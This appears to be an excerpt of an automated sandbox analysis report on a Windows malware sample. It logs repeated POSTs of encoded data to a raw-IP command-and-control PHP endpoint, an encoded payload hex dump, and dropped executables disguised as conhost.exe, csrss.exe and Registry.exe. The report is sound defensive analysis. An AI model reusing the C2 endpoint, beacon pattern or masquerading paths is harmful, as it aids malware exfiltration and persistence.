                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1332Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1332Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1332Expect: 100-continueConnection: Keep-AliveData Raw: 58 5e 5a 5d 5d 5e 51 58 5b 5c 51 5a 55 59 5a 5f 58 59 5a 48 59 5a 5a 5c 50 56 5f 53 5f 5e 58 5d 42 5a 53 59 53 54 52 52 5a 58 55 53 59 5e 51 5b 52 55 5a 5c 41 5d 54 54 57 5d 5f 5d 5f 5d 58 5d 5e 53 5a 58 55 58 50 55 5d 58 58 5d 42 5b 5a 5b 50 5b 5c 53 55 5f 5a 40 52 55 5a 55 5b 5e 56 52 5a 58 5a 53 57 52 43 5f 5c 50 41 50 5c 51 5a 5a 55 4a 5c 52 46 5b 54 50 58 5c 54 59 56 50 47 53 5e 55 5f 56 5b 59 5b 5c 43 55 58 53 54 48 55 55 55 5e 51 59 5e 54 53 5f 5a 48 5a 5f 55 5d 54 54 5c 55 58 5a 5a 5a 54 57 51 5d 50 57 5a 51 50 56 46 58 59 51 5f 5c 5a 55 0e 1e 2e 42 27 20 27 01 23 2f 34 13 35 26 3f 13 2b 3c 23 13 32 07 05 17 2c 3e 23 0c 33 25 20 50 26 3d 3d 58 24 37 22 44 33 58 24 18 3a 2b 27 5b 00 0b 25 1f 22 04 1d 5f 2c 0c 31 5d 2a 1f 0a 12 2e 32 3b 44 21 07 2c 5a 25 5a 35 58 32 5d 32 12 31 16 2b 5e 3c 06 20 11 26 07 20 45 24 3c 0e 1b 2b 0d 08 0e 33 05 03 0e 3f 5d 28 15 3f 0f 28 1d 36 2d 0e 0a 27 3c 2e 5f 2a 30 0b 07 3e 2b 2b 57 2a 02 24 5c 24 06 2e 03 27 0b 23 06 3c 00 32 56 32 04 32 16 28 04 2c 18 3f 3e 01 18 2e 14 27 1d 2b 32 3c 1e 27 3d 0d 0a 36 04 25 1b 3e 0e 25 5c 33 0e 3c 0c 21 54 2a 07 28 26 33 55 3d 3a 04 15 27 01 56 52 29 2b 38 1c 34 1d 07 1e 26 3f 3c 5b 29 39 07 0d 3e 0a 3c 0c 2b 38 30 03 25 32 30 59 30 24 0b 5e 2b 10 0e 0b 22 33 02 07 33 3c 2e 57 2a 00 2a 59 09 1e 2a 10 39 00 1a 52 25 03 3c 5f 26 1d 0c 09 25 27 20 5b 27 06 20 58 21 50 33 5e 3c 5a 37 12 32 17 27 5a 39 03 38 1e 24 1c 20 57 25 3d 03 1f 24 1a 0f 19 30 00 01 04 2e 5a 23 14 3f 18 25 11 31 2a 05 05 28 31 2d 5f 29 31 06 02 2f 32 3b 43 26 00 2c 5e 26 02 29 05 24 06 2e 12 25 5e 2f 58 28 16 2c 5a 32 10 24 0b 30 3c 01 05 28 23 2e 0c 26 2b 00 57 3c 2b 09 01 2a 32 38 13 23 3e 2b 53 30 2f 2a 5d 2a 33 35 5e 3c 2c 38 0c 29 3c 38 13 20 05 1c 03 26 36 30 15 29 39 2a 1b 22 03 04 05 2b 29 30 18 28 58 3f 51 2c 2a 2c 07 3d 0c 24 55 25 2d 2c 14 22 39 39 15 29 09 3d 5f 24 51 3b 51 35 32 08 05 3c 26 20 0c 3e 14 36 0b 22 2c 2e 5a 2b 02 3c 50 20 0d 21 0e 27 02 27 36 3d 5e 3a 53 33 35 28 2f 2b 39 1a 1f 39 3d 33 26 38 40 00 11 32 06 2c 54 0a 22 16 28 3a 3f 0b 28 36 59 13 00 35 0c 07 06 14 07 20 10 38 3e 05 20 3a 57 0c 0a 3c 32 3b 3b 23 3e 58 5f 39 35 06 27 34 58 12 32 32 3b 0d 5f 02 5b 38 1c 33 39 19 29 39 2c 32 5b 3a 25 3d 26 0e 3d 3b 27 36 06 02 07 36 37 1c 1f 32 14 27 3e 3f 56 51 1e 32 32 05 39 01 26 05 05 3b 3d 0d 58 0a 3e 3e 1c 38 37 29 21 0a 2b 16 1a 32 29 27 22 3f 5a 05 01 0e 5a 05 3e 03 09 2e 0c 3e 2a 31 0e 12 28 2f 18 30 0b 3b 0f 21 59 53 0d 3d 2e 31 1c 00 23 26 36 24 06 0e 0c 29 05 1e 10 3e 00 3d 25 0c 0f 23 1a 33 03 0f 0b 26 07 03 3e 26 38 0a 53 04 2d 20 26 06 29 27 1a 37 23 19 13 31 5a 09 29 0f 5e 00 11 32
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1332Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.87.199.107
                    Source: unknownHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: conhost.exe, 00000027.00000002.3254317705.0000000002AFF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3254317705.000000000297B000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3254317705.00000000026AD000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3254317705.000000000285E000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3254317705.000000000276D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.87.199.107
                    Source: conhost.exe, 00000027.00000002.3254317705.00000000026AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.87.199.107/Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/
                    Source: conhost.exe, 00000027.00000002.3254317705.0000000002AFF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3254317705.000000000297B000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3254317705.00000000026AD000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3254317705.000000000285E000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3254317705.000000000276D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.87.199.107/Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncP
                    Source: conhost.exe, 00000027.00000002.3254317705.000000000297B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.87.H
                    Source: KtMg6d1Ivx.exe, 00000000.00000002.2040685305.0000000003804000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3254317705.00000000026AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: csrss.exe, 00000029.00000002.2473071988.0000000003037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile created: C:\Windows\ImmersiveControlPanel\pris\conhost.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCB818CC877B7C4E7BA59872CD9B93F1.TMPJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeCode function: 0_2_00007FF848F313000_2_00007FF848F31300
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeCode function: 0_2_00007FF8490EEEA80_2_00007FF8490EEEA8
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeCode function: 0_2_00007FF8490EFFFA0_2_00007FF8490EFFFA
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeCode function: 0_2_00007FF8490EFFF80_2_00007FF8490EFFF8
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeCode function: 11_2_00007FF848F1130011_2_00007FF848F11300
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeCode function: 12_2_00007FF848F7600012_2_00007FF848F76000
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeCode function: 12_2_00007FF848F80B1C12_2_00007FF848F80B1C
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeCode function: 12_2_00007FF848F3FD6212_2_00007FF848F3FD62
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeCode function: 29_2_00007FF848F7600029_2_00007FF848F76000
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeCode function: 29_2_00007FF848F80B1C29_2_00007FF848F80B1C
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeCode function: 30_2_00007FF848F5600030_2_00007FF848F56000
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeCode function: 30_2_00007FF848F60B1C30_2_00007FF848F60B1C
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeCode function: 30_2_00007FF848F1FD6230_2_00007FF848F1FD62
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeCode function: 31_2_00007FF848F2130031_2_00007FF848F21300
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeCode function: 32_2_00007FF848F0130032_2_00007FF848F01300
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeCode function: 33_2_00007FF848F5600033_2_00007FF848F56000
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeCode function: 33_2_00007FF848F60B1C33_2_00007FF848F60B1C
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeCode function: 34_2_00007FF848F1FD6234_2_00007FF848F1FD62
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeCode function: 34_2_00007FF848F5600034_2_00007FF848F56000
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeCode function: 34_2_00007FF848F60B1C34_2_00007FF848F60B1C
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeCode function: 35_2_00007FF848F3FD6235_2_00007FF848F3FD62
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeCode function: 35_2_00007FF848F7600035_2_00007FF848F76000
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeCode function: 35_2_00007FF848F80B1C35_2_00007FF848F80B1C
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeCode function: 36_2_00007FF848F5600036_2_00007FF848F56000
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeCode function: 36_2_00007FF848F60B1C36_2_00007FF848F60B1C
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeCode function: 38_2_00007FF848F7600038_2_00007FF848F76000
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeCode function: 38_2_00007FF848F80B1C38_2_00007FF848F80B1C
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeCode function: 38_2_00007FF848F3FD6238_2_00007FF848F3FD62
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeCode function: 38_2_00007FF848F3FCA138_2_00007FF848F3FCA1
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeCode function: 38_2_00007FF848F316EF38_2_00007FF848F316EF
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeCode function: 39_2_00007FF848F2FD6239_2_00007FF848F2FD62
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeCode function: 39_2_00007FF848F70B1C39_2_00007FF848F70B1C
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeCode function: 39_2_00007FF848F6600039_2_00007FF848F66000
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeCode function: 39_2_00007FF8490E5BDF39_2_00007FF8490E5BDF
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeCode function: 39_2_00007FF8490DEEA839_2_00007FF8490DEEA8
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeCode function: 39_2_00007FF8490DFFF839_2_00007FF8490DFFF8
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeCode function: 39_2_00007FF8490DFFFA39_2_00007FF8490DFFFA
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\bveMYDWO.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                    Source: bveMYDWO.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: vnUJHstD.log.39.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: KtMg6d1Ivx.exe, 00000000.00000000.1988230334.0000000000C44000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs KtMg6d1Ivx.exe
                    Source: KtMg6d1Ivx.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs KtMg6d1Ivx.exe
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: cryptbase.dllJump to behavior
